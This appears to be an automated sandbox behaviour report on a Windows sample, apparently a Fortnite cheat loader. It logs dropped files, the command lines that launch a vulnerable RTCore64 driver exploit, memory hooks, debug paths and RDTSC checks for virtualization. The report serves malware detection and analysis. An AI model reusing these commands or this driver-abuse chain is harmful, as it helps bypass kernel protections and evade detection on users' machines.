Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys

Jump to behavior

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\Vulnerability.exe	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\driver.sys	Jump to behavior
Source: C:\Windows\Vulnerability.exe	File created: C:\Windows\symbols\	Jump to behavior

Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E3CE0	5_2_00007FF7738E3CE0
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E1330	5_2_00007FF7738E1330
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F1630	5_2_00007FF7738F1630
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E45E0	5_2_00007FF7738E45E0
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E6440	5_2_00007FF7738E6440
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738EFBF0	5_2_00007FF7738EFBF0
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E6810	5_2_00007FF7738E6810
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E5010	5_2_00007FF7738E5010
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F3B60	5_2_00007FF7738F3B60
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E72B0	5_2_00007FF7738E72B0
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E7EA0	5_2_00007FF7738E7EA0
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F32C0	5_2_00007FF7738F32C0

Source: C:\Windows\Vulnerability.exe

Code function: String function: 00007FF7738EA3C0 appears 102 times

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1308 -s 1708

Source: driver[1].sys.0.dr	Binary string: \Device\{83040329-923403830}
Source: Vulnerability.exe.0.dr	Binary string: \Device\PhysicalMemory
Source: Vulnerability.exe.0.dr	Binary string: 0\DosDevices\RTCore64\Device\RTCore64

Source: classification engine

Classification label: mal100.expl.evad.winEXE@25/5@1/3

Source: C:\Windows\Vulnerability.exe

Code function: 5_2_00007FF7738F14C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle,

5_2_00007FF7738F14C0

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\60023779-100a-4137-a2cb-f060494dee00

Jump to behavior

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Iyto7FYCJO.exe

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\Iyto7FYCJO.exe "C:\Users\user\Desktop\Iyto7FYCJO.exe"
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sys
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driver.sys
Source: C:\Windows\Vulnerability.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 \| find /i /v "md5" \| find /i /v "certutil"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "md5"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "certutil"
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1308 -s 1708
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sys	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 \| find /i /v "md5" \| find /i /v "certutil"	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driver.sys	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "md5"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "certutil"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5	Jump to behavior

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Iyto7FYCJO.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: Iyto7FYCJO.exe

Static file information: File size 6070784 > 1048576

Source: Iyto7FYCJO.exe

Static PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x5c9a00

Source: Iyto7FYCJO.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mbols/wi.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E867000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\ioctl base updated by redshirtfan\build\driver\driver.pdb source: Iyto7FYCJO.exe, 00000000.00000003.2159382259.0000022AC022F000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, driver.sys.0.dr, driver[1].sys.0.dr
Source:	Binary string: win32k.pdbGCTL source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source:	Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb`2 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbW source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69D00D000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106140610.000002B69E957000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: s/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69D030000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: GET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1V source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Unknown exceptionbad array new lengthstring too longbad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5.sysF source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb3.pdbE140.dll source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ConnectionKeep-Alive/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb33 source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source:	Binary string: Hostmsdl.microsoft.comGET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1' source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp1

Source: Iyto7FYCJO.exe	Static PE information: section name: _RDATA
Source: Iyto7FYCJO.exe	Static PE information: section name: .vmp0
Source: Iyto7FYCJO.exe	Static PE information: section name: .vmp1

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows\Vulnerability.exe

Jump to behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys			Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\driver.sys			Jump to behavior

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\Vulnerability.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys	Jump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\driver.sys	Jump to dropped file

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\Vulnerability.exe			Jump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\driver.sys			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Memory written: PID: 1308 base: 7FF8C8A50008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Memory written: PID: 1308 base: 7FF8C88ED9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Memory written: PID: 1308 base: 7FF8C8A6000D value: E9 BB CB EB FF	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Memory written: PID: 1308 base: 7FF8C891CBC0 value: E9 5A 34 14 00	Jump to behavior

Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	RDTSC instruction interceptor: First address: 7FF7A3036BA4 second address: 7FF7A3036BAD instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop edi 0x00000004 inc ax 0x00000006 movsx edx, bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	RDTSC instruction interceptor: First address: 7FF7A300CFB8 second address: 7FF7A308E2DA instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 push 23360512h 0x00000008 call 00007F93C8DCC21Ch 0x0000000d inc ecx 0x0000000e push edi 0x0000000f jmp 00007F93C8E1CC87h 0x00000014 inc ecx 0x00000015 push ebx 0x00000016 pushfd 0x00000017 dec ecx 0x00000018 rcr ebx, cl 0x0000001a push eax 0x0000001b inc ecx 0x0000001c bt ebx, FFFFFFF4h 0x00000020 inc bp 0x00000022 bts ebx, ebp 0x00000025 inc ecx 0x00000026 push ebp 0x00000027 inc ecx 0x00000028 shr bl, cl 0x0000002a xchg al, ah 0x0000002c rcr ah, FFFFFF99h 0x0000002f inc ecx 0x00000030 push edx 0x00000031 inc bp 0x00000033 movsx ebx, cl 0x00000036 bswap eax 0x00000038 push ebx 0x00000039 inc esp 0x0000003a mov ebx, edi 0x0000003c push edx 0x0000003d inc sp 0x0000003f btr eax, esi 0x00000042 btc ax, FFE0h 0x00000047 inc cx 0x00000049 sar ebx, 6Bh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e inc ecx 0x0000004f xor bl, FFFFFFB7h 0x00000052 push ebp 0x00000053 inc eax 0x00000054 rol ch, 00000007h 0x00000057 push ecx 0x00000058 dec ebp 0x00000059 test edi, ebx 0x0000005b push esi 0x0000005c push edi 0x0000005d bsf di, sp 0x00000061 inc ebp 0x00000062 cmp ch, ch 0x00000064 inc ecx 0x00000065 shr bl, cl 0x00000067 inc ecx 0x00000068 push eax 0x00000069 rdtsc
